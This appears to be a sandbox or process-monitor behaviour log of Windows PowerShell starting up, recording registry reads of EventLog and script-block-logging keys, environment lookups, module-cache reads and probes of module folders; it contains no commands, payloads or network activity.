Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Environment Get Environment String name = USERPROFILE, result_out = C:\Users\FD1HVy True 1
Fn
File Get Info filename = C:\Users\FD1HVy, type = file_attributes True 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
File Get Info filename = C:\, type = file_attributes True 2
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 162
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
Thread 0x12a8
1 0
»
Category Operation Information Success Count Logfile
System Sleep duration = -1 (infinite) True 1
Fn
Thread 0x1044
2 0
»
Category Operation Information Success Count Logfile
Environment Get Environment String name = PinnableBufferCache_System.Threading.OverlappedData_Disabled False 1
Fn
Environment Get Environment String name = PinnableBufferCache_System.Threading.OverlappedData_MinCount False 1
Fn
Thread 0x1188
381 50
»
Category Operation Information Success Count Logfile
Environment Get Environment String name = PSModuleAutoLoadingPreference False 1
Fn
Environment Get Environment String name = MshEnableTrace False 3
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging False 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Environment Get Environment String name = PSModuleAutoLoadingPreference False 1
Fn
Environment Get Environment String name = PATH True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps;;C:\Program Files\Microsoft Office\root\Client True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL True 2
Fn
File Get Info filename = C:\ProgramData\Oracle\Java\javapath, type = file_attributes True 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
File Get Info filename = C:\WINDOWS\system32, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\System32\Wbem, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\System32\WindowsPowerShell\v1.0\, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\Microsoft Office\root\Client, type = file_attributes True 1
Fn
Environment Get Environment String name = PSMODULEPATH, result_out = C:\Users\FD1HVy\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules True 1
Fn
File Get Info filename = C:\Users\FD1HVy\Documents\WindowsPowerShell\Modules, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Modules.psd1, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Modules.psm1, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Modules.cdxml, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Modules.xaml, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Modules.ni.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Modules.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Microsoft.PowerShell.Operation.Validation.psd1, type = file_attributes True 2
Fn
Environment Get Environment String name = PSModuleAnalysisCachePath False 1
Fn
File Get Info filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, type = file_attributes True 1
Fn
File Create filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, type = file_type True 2
Fn
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4096, size_out = 4096 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 3, size_out = 3 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4096, size_out = 4096 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 9, size_out = 9 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4096, size_out = 4096 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 44, size_out = 44 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4096, size_out = 4096 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 12, size_out = 12 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4096, size_out = 4096 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4, size_out = 4 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4096, size_out = 4096 True 2
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 7, size_out = 7 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4096, size_out = 4096 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 22, size_out = 22 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4096, size_out = 4096 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 19, size_out = 19 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4096, size_out = 4096 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 2, size_out = 2 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4096, size_out = 4096 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 24, size_out = 24 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4096, size_out = 4096 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 11, size_out = 11 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4096, size_out = 3715 True 1
Fn
Data
Environment Get Environment String name = PSDisableModuleAnalysisCacheCleanup False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\Microsoft.PowerShell.Operation.Validation.psd1, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\Microsoft.PowerShell.Operation.Validation.psm1, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\Microsoft.PowerShell.Operation.Validation.cdxml, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\Microsoft.PowerShell.Operation.Validation.xaml, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\Microsoft.PowerShell.Operation.Validation.ni.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\Microsoft.PowerShell.Operation.Validation.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, type = file_attributes True 2
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psd1, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psm1, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.cdxml, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.xaml, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.ni.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1, type = file_attributes True 2
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, type = file_attributes True 2
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.psd1, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.psm1, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.cdxml, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.xaml, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.ni.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1, type = file_attributes True 2
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psd1, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psm1, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.cdxml, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.xaml, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.ni.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\PSReadline.psd1, type = file_attributes True 2
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1, type = file_attributes True 2
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.psd1, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.psm1, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.cdxml, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.xaml, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.ni.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Modules.psd1, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Modules.psm1, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Modules.cdxml, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Modules.xaml, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Modules.ni.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Modules.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AppLocker, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AppvClient, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Appx, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AssignedAccess, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitLocker, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BranchCache, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\CimCmdlets, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\ConfigCI, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Defender, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\DeliveryOptimization, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Dism, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\DnsClient, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\EventTracingManagement, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\International, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\iSCSI, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\ISE, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Kds, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Diagnostics, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Host, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts, type = file_attributes True 1
Fn
